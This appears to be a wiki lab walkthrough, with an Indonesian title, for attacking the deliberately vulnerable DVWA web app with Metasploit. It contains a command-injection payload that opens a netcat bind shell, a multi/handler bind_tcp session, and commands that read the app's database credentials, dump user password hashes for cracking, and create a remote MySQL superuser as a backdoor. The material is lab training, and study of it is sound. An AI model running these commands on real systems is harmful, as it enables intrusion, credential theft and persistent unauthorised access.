DVWA: Serangan Menggunakan Metasploit
Jump to navigation
Jump to search
Web DVWA
- Masuk ke Command Execution
- Isi dengan
192.168.1.106;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe
Dari Kali Linux
- Gunakan Backtrack / Kali Linux.
- Applications --> BackTrack --> Exploitation Tools --> Network Exploitation Tools --> Metasploit Framework --> msfconsole.
use multi/handler
set PAYLOAD linux/x86/shell/bind_tcp
show options
set RHOST 192.168.0.80
192.168.0.80 is the IP Address of the Fedora Server running DVWA. To obtain this IP Address, see Section 3, Step 3.
exploit
whoami
This command prints the username for the effective userid. If the username was root, then we would be in full control; however, the username is apache.
grep apache /etc/passwd
Here I am checking if the username is allowed to login remotely. When a shell is set to /sbin/nologin, then that user cannot login remotely. grep apache /etc/group
It is important to discover other additional groups that apache might belong to. In this case, apache is pretty well protected.
ps -eaf | grep http
Typically, the Apache web server processes will run with a daemon called httpd.
pwd
Print the current working directory.
This actually tells us a lot. It tell us the exact path of where the NetCat command was executed from in Section 6, Step 2.
ls -ld /var/www/html
In Fedora, the "DocumentRoot" path is typically /var/www/html.
If this directory was owned by apache instead of root we could do some web graffiti and many other things.
ls -ld /var/www/html/dvwa
The parent directory for the DVWA is /var/www/html/dvwa.
Unfortunately, the apache username only has world read and execute permissions.
ls -l /var/www/html/dvwa
Now we are going to explore the contents of the DVWA directory.
Notice, there is a config directory.
Config directories are important because they contain database credential information.
ls -l /var/www/html/dvwa/config
We are shown there is a configuration file with a permission problem.
The config.inc.php problem is that its' permissions are set to 644, meaning that anyone can read this file.
cat /var/www/html/dvwa/config/config.inc.php
Bingo!!!
For the database name dvwa, the user is root and the password is dvwaPASSWORD.
echo "show databases;" | mysql -uroot -pdvwaPASSWORD
Show all databases in mysql.
echo "use dvwa; show tables;" | mysql -uroot -pdvwaPASSWORD
Show all tables in the dvwa database.
echo "use dvwa; desc users;" | mysql -uroot -pdvwaPASSWORD
Describe the fields of the dvwa.users table.
echo "select * from dvwa.users;" | mysql -uroot -pdvwaPASSWORD
Print the contents of the dvwa.users table.
Notice the password field is displayed, where you can use tools like John the Ripper to crack it.
echo "insert into dvwa.users values ('6','John','Gray','jgray',MD5('abc123'),'NA');" | mysql -uroot -pdvwaPASSWORD
This create a new username in the dvwa.users tables.
echo "select * from dvwa.users;" | mysql -uroot -pdvwaPASSWORD
Notice there is now a new record #6.
If you wanted to create an additional user, the next available user_id would incremental to #7 and so on.
echo "show databases;" | mysql -uroot -pdvwaPASSWORD
Shows all the databases on the machine.
echo "use mysql; show tables;" | mysql -uroot -pdvwaPASSWORD
echo "use mysql; GRANT ALL PRIVILEGES ON *.* TO 'db_hacker'@'%' IDENTIFIED BY 'abc123' WITH GRANT OPTION;" | mysql -uroot -pdvwaPASSWORD
This created a new user named db_hacker with a password of abc123 that can login from anywhere with connectivity.
echo "select * from mysql.user;" | mysql -uroot -pdvwaPASSWORD
Notice the very last newly created entry.
mysql -u db_hacker -h 192.168.0.80 -p
Replace 192.168.0.80 with the Fedora IP Address obtained (Section 3, Step 3)
The db_hacker password is "abc123" or whatever you set it too.
show databases;
quit
date
echo "Your Name"
Replace the string "Your Name" with your actual name.
E.g., echo "John Gray"